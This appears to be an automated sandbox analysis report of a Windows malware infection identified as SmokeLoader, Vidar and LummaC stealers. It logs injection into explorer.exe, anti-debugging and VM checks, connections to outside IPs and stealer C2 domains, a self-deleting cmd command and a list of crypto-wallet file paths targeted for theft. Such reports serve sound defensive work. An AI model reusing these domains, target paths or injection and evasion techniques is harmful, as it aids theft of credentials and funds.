Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\ProgramData\DGHIECGCBKFH\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\sqls[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\vcruntime140[1].dll	Jump to dropped file

Source: C:\Windows\explorer.exe TID: 6044	Thread sleep count: 384 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804	Thread sleep count: 2725 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804	Thread sleep time: -272500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5704	Thread sleep count: 872 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 5704	Thread sleep time: -87200s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 320	Thread sleep count: 216 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6768	Thread sleep count: 355 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6768	Thread sleep time: -35500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1848	Thread sleep count: 345 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1848	Thread sleep time: -34500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804	Thread sleep count: 1956 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 6804	Thread sleep time: -195600s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe TID: 5548	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe TID: 5548	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe TID: 768	Thread sleep count: 54 > 30

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

File Volume queried: C:\ FullSizeInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CC9EBF0 PR_GetNumberOfProcessors,GetSystemInfo,

9_2_6CC9EBF0

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\	Jump to behavior

Source: explorer.exe, 00000002.00000000.2038509404.0000000009AF9000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW0r
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000%
Source: BFBGHD.9.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: BFBGHD.9.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000A
Source: A247.exe, 00000005.00000003.2411290273.0000000002E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: BFBGHD.9.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B2C000.00000004.00000001.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678333691.0000000000913000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2871925819.00000000008D9000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2384817568.0000000000909000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2678080864.0000000000911000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000002.2872028176.0000000000907000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.0000000000795000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007BA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: BFBGHD.9.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: BFBGHD.9.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: BFBGHD.9.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTcaVMWare
Source: BFBGHD.9.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: kat2225.tmp, 00000009.00000002.3185736786.0000000005120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMwareta=
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: BFBGHD.9.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: BFBGHD.9.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BFBGHD.9.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}^
Source: A247.exe, 00000005.00000003.2411290273.0000000002E55000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: kat2225.tmp, 00000009.00000002.3185736786.0000000005120000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: VMwareVMware
Source: BFBGHD.9.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.NoneVMware-42 27 d9 2e dc 89 72 dX
Source: BFBGHD.9.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000_
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.2036556348.000000000769A000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BFBGHD.9.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000073E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWHHz%SystemRoot%\system32\mswsock.dll+
Source: explorer.exe, 00000002.00000000.2036556348.00000000076F8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}99105f770555d7dd
Source: BFBGHD.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware, Inc.
Source: BFBGHD.9.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: BFBGHD.9.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: BFBGHD.9.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: BFBGHD.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: BFBGHD.9.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: BFBGHD.9.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: BFBGHD.9.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: BFBGHD.9.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: BFBGHD.9.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: BFBGHD.9.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: BFBGHD.9.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: BFBGHD.9.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: BFBGHD.9.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000082E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: BFBGHD.9.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware-42 27 d9 2e dc 89 72 dX
Source: BFBGHD.9.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: BFBGHD.9.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: explorer.exe, 00000002.00000000.2035970319.0000000003530000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware,p
Source: BFBGHD.9.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: explorer.exe, 00000002.00000000.2035435817.0000000000F13000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000

Source: C:\Users\user\Desktop\3.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\3.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))

Source: C:\Users\user\Desktop\3.exe	System information queried: CodeIntegrityInformation			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	System information queried: CodeIntegrityInformation			Jump to behavior

Source: C:\Users\user\Desktop\3.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Code function: 5_2_008B2CD7 rdtsc

5_2_008B2CD7

Source: C:\Users\user\Desktop\3.exe

Code function: 0_2_00402A9F LdrLoadDll,

0_2_00402A9F

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CD6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_6CD6AC62

Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02D51EF6 push dword ptr fs:[00000030h]	0_2_02D51EF6
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02E40D90 mov eax, dword ptr fs:[00000030h]	0_2_02E40D90
Source: C:\Users\user\Desktop\3.exe	Code function: 0_2_02E4092B mov eax, dword ptr fs:[00000030h]	0_2_02E4092B
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02E20D90 mov eax, dword ptr fs:[00000030h]	4_2_02E20D90
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02E2092B mov eax, dword ptr fs:[00000030h]	4_2_02E2092B
Source: C:\Users\user\AppData\Roaming\rcjjrra	Code function: 4_2_02EB0FD6 push dword ptr fs:[00000030h]	4_2_02EB0FD6
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_0061092B mov eax, dword ptr fs:[00000030h]	5_2_0061092B
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_00610D90 mov eax, dword ptr fs:[00000030h]	5_2_00610D90
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Code function: 5_2_008ADA5B push dword ptr fs:[00000030h]	5_2_008ADA5B

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CD6AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

9_2_6CD6AC62

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 5358.exe.2.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 190.187.52.42 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 88.225.215.104 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 91.202.233.231 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 23.145.40.124 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 45.129.96.86 80	Jump to behavior

Yara detected Powershell download and execute

Source: Yara match

File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\5358.exe

Memory allocated: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000 protect: page execute and read and write

Jump to behavior

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\5358.exe

Code function: 8_2_043BA4F0 NtAllocateVirtualMemory,GetTempFileNameA,CreateFileA,WriteFile,CreateProcessA,NtUnmapViewOfSection,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,Wow64GetThreadContext,Wow64SetThreadContext,ResumeThread,ExitProcess,

8_2_043BA4F0

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\3.exe	Thread created: C:\Windows\explorer.exe EIP: 33519E0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Thread created: unknown EIP: 32019E0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\5358.exe

Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: A247.exe	String found in binary or memory: zippyfinickysofwps.shop
Source: A247.exe	String found in binary or memory: obsceneclassyjuwks.shop
Source: A247.exe	String found in binary or memory: acceptabledcooeprs.shop
Source: A247.exe	String found in binary or memory: whispedwoodmoodsksl.shop
Source: A247.exe	String found in binary or memory: boredimperissvieos.shop
Source: A247.exe	String found in binary or memory: holicisticscrarws.shop
Source: A247.exe	String found in binary or memory: sweetsquarediaslw.shop
Source: A247.exe	String found in binary or memory: plaintediousidowsko.shop
Source: A247.exe	String found in binary or memory: miniaturefinerninewjs.shop

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\3.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\Desktop\3.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Users\user\AppData\Roaming\rcjjrra	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read	Jump to behavior

Sample uses process hollowing technique

Source: C:\Users\user\AppData\Local\Temp\5358.exe

Section unmapped: C:\Users\user\AppData\Local\Temp\kat2225.tmp base address: 400000

Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\Temp\5358.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 422000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 42E000	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\5358.exe	Memory written: C:\Users\user\AppData\Local\Temp\kat2225.tmp base: 641000	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\5358.exe	Process created: C:\Users\user\AppData\Local\Temp\kat2225.tmp C:\Users\user\AppData\Local\Temp\kat2225.tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat2225.tmp" & rd /s /q "C:\ProgramData\DGHIECGCBKFH" & exit	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CDB4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

9_2_6CDB4760

Source: explorer.exe, 00000002.00000000.2038509404.0000000009B41000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.2036443030.0000000004B00000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000002.00000000.2035717446.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000002.00000000.2035435817.0000000000EF8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CD6AE71 cpuid

9_2_6CD6AE71

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\A247.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\A247.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CD6A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

9_2_6CD6A8DC

Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp

Code function: 9_2_6CCB8390 NSS_GetVersion,

9_2_6CCB8390

Source: C:\Users\user\AppData\Local\Temp\A247.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: A247.exe, 00000005.00000002.2872781231.0000000002DC3000.00000004.00000800.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2723791713.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, A247.exe, 00000005.00000003.2688986556.000000000096F000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000003.2985940074.00000000007D2000.00000004.00000020.00020000.00000000.sdmp, kat2225.tmp, 00000009.00000002.3159795839.00000000007C4000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\AppData\Local\Temp\A247.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\kat2225.tmp	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * From AntiVirusProduct

Stealing of Sensitive Information

Yara detected CryptOne packer

Source: Yara match

File source: 00000008.00000002.2674561163.00000000043B9000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected LummaC Stealer

Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: A247.exe PID: 6204, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected SmokeLoader

Source: Yara match	File source: 00000000.00000002.2056480507.0000000002E71000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2319406747.0000000002E30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2056438755.0000000002E50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2319442146.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY

Yara detected Vidar

Source: Yara match

File source: sslproxydump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match	File source: 8.2.5358.exe.4387719.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.2590000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.4387719.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.45b0000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.45b0000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.5358.exe.2590000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2673984496.0000000002590000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2674868300.00000000045B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2674561163.00000000042B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 5358.exe PID: 4296, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: kat2225.tmp PID: 6716, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: A247.exe, 00000005.00000003.2723902348.0000000000907000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Wallets/Electrum
Source: kat2225.tmp, 00000009.00000002.3159795839.000000000086E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Bitcoin Core\|1\|\Bitcoin\wallets\\|wallet.dat\|1\|Bitcoin Core Old\|1\|\Bitcoin\\|wallet.dat\|0\|Dogecoin\|1\|\Dogecoin\\|wallet.dat\|0\|Raven Core\|1\|\Raven\\|wallet.dat\|0\|Daedalus Mainnet\|1\|\Daedalus Mainnet\wallets\\|she.sqlite\|0\|Blockstream Green\|1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Exodus\|1\|\Exodus\backups\\|.\|1\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.wallet\|0\|Coinomi\|0\|\Coinomi\Coinomi\wallets\\|.config\|0\|Ledger Live\Local Storage\leveldb\|1\|\Ledger Live\Local Storage\leveldb\\|.\|0\|Ledger Live\Session Storage\|1\|\Ledger Live\Session Storage\\|.\|0\|Ledger Live\|1\|\Ledger Live\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\config\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\run\\|.\|0\|Chia Wallet\|2\|\.chia\mainnet\wallet\\|.sqlite\|0\|Komodo Wallet (Atomic)\config\|1\|\atomic_qt\config\\|.\|0\|Komodo Wallet (Atomic)\exports\|1\|\atomic_qt\exports\\|.\|0\|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|1\|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\\|.\|0\|Guarda Desktop\Local Storage\leveldb\|1\|\Guarda\Local Storage\leveldb\\|.*\|0\|
